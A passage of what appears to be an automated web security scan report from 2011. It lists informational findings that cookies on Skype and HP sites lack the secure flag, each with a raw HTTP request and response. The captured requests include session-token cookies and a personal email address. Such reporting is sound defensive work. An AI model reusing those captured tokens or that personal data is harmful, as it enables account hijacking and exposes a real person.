ETag: "61d8deb12cc966aee5f69d82e6b40873"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca; path=/; expires=Sun, 04-Sep-2011 21:47:33 GMT; HttpOnly
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=11167
X-UA-Compatible: IE=edge,chrome=1
Content-Length: 4934
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Skype Developer Zone - Signup</title>
<link rel="stylesheet" href="/stylesheets/templates/reset.css" type="text/css" media="al
...[SNIP]...

7.20. https://developer.skype.com/silk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /silk

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /silk HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:47 GMT
Server: Apache
ETag: "3800c70fc911ae730e84af42c23f038c"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:47 GMT; HttpOnly
Content-Length: 11000
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=65653
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

7.21. https://developer.skype.com/skypekit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /skypekit

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /skypekit HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:47:44 GMT
Server: Apache
Cache-Control: no-cache
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:44 GMT; HttpOnly
Location: https://developer.skype.com/login
Content-Length: 99
Status: 302
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=7992
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="https://developer.skype.com/login">redirected</a>.</body></html>

7.22. https://developer.skype.com/stylesheets/templates/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /stylesheets/templates/main.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /stylesheets/templates/main.css HTTP/1.1
Accept: text/css
Referer: https://developer.skype.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: developer.skype.com
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:07:21 GMT
Server: Apache
ETag: "bb0d76b971eb85d81bf5d1a90e4b9064"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca; path=/; expires=Sun, 04-Sep-2011 21:47:21 GMT; HttpOnly
Last-Modified: Thu, 18 Aug 2011 18:18:59 GMT
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=76039
X-UA-Compatible: IE=edge,chrome=1
Content-Length: 48546
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css; charset=utf-8

/* NOTE
   This is the stylesheet for the "Skype Developer" website

========================================================================*/
@import url(/stylesheets/flash.css);
@import url(/styleshe
...[SNIP]...

7.23. https://developer.skype.com/stylesheets/templates/reset.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /stylesheets/templates/reset.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /stylesheets/templates/reset.css HTTP/1.1
Accept: text/css
Referer: https://developer.skype.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: developer.skype.com
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:07:21 GMT
Server: Apache
ETag: "232dea73b063f0090e2d01fe928b3e80"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca; path=/; expires=Sun, 04-Sep-2011 21:47:21 GMT; HttpOnly
Last-Modified: Fri, 26 Mar 2010 12:12:31 GMT
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=58853
X-UA-Compatible: IE=edge,chrome=1
Content-Length: 503
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css; charset=utf-8

/* Y!UI reset.css http://developer.yahoo.com/yui/reset/ */
body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td {
   margin:0;
   padding:0;
}
table {
   border-
...[SNIP]...

7.24. https://developer.skype.com/support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /support

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:49 GMT
Server: Apache
ETag: "483ccd0d54f1b1c4a59a9f318d77c152"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:49 GMT; HttpOnly
Content-Length: 8414
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=52130
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

7.25. https://developer.skype.com/support/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /support/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/ HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:54 GMT
Server: Apache
ETag: "483ccd0d54f1b1c4a59a9f318d77c152"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:54 GMT; HttpOnly
Content-Length: 8414
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=24802
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

7.26. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://h30046.www3.hp.com
Path:   /subchoice/country/us/en/subhub.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /subchoice/country/us/en/subhub.aspx HTTP/1.1
Host: h30046.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 16:31:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: lang=en-us; path=/
Set-Cookie: cc=us; path=/
Set-Cookie: hp_xp=; expires=Mon, 05-Sep-2011 00:31:08 GMT; path=/; secure
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 93095


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_ctl00_htmlTag" xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...

7.27. https://login.skype.com/account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://login.skype.com/account/login-form?product-type=package-global-region-landline-eu-unlimited&application=subscription&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session=l5p5g0er47bh75g44j3p4n46h7

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:19:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-2012 21:19:35 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 33957
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

7.28. https://login.skype.com/account/login-form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/login-form

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/login-form?product-type=package-global-region-landline-eu-unlimited&application=subscription&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session=l5p5g0er47bh75g44j3p4n46h7

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:19:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-2012 21:19:11 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 47339
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...

7.29. https://login.skype.com/account/password-automation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/password-automation

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/password-automation HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://login.skype.com/account/password-reset-request?setlang=en&intsrc=client%7Cforgot-name
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:00:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 18:00:16 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 43776
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="lt
...[SNIP]...

7.30. https://login.skype.com/account/password-token-sent  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/password-token-sent

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/password-token-sent?mode=&email=h02332%40gmail.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://login.skype.com/account/password-reset-request?setlang=en&intsrc=client%7Cforgot-pword
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 20:59:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 20:59:41 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 41059
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...

7.31. https://login.skype.com/account/signup-form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/signup-form

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/signup-form?setlang=en&intsrc=client%7Creg-a%7C0%2F5.5.0.114 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3
Host: login.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:59:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 17:59:54 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 119699
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...

7.32. https://login.skype.com/go/shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/shop HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:25 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

7.33. https://login.skype.com/go/shop.accessories.headsets  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop.accessories.headsets

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/shop.accessories.headsets HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:27 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

7.34. https://login.skype.com/go/shop.accessories.phones  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop.accessories.phones

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/shop.accessories.phones HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:06 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

7.35. https://login.skype.com/go/shop.accessories.webcams  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop.accessories.webcams

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/shop.accessories.webcams HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:18 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

7.36. https://login.skype.com/go/shop.extras  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop.extras

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/shop.extras HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:20 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

7.37. https://login.skype.com/go/skype.manager.setup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/skype.manager.setup

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/skype.manager.setup HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
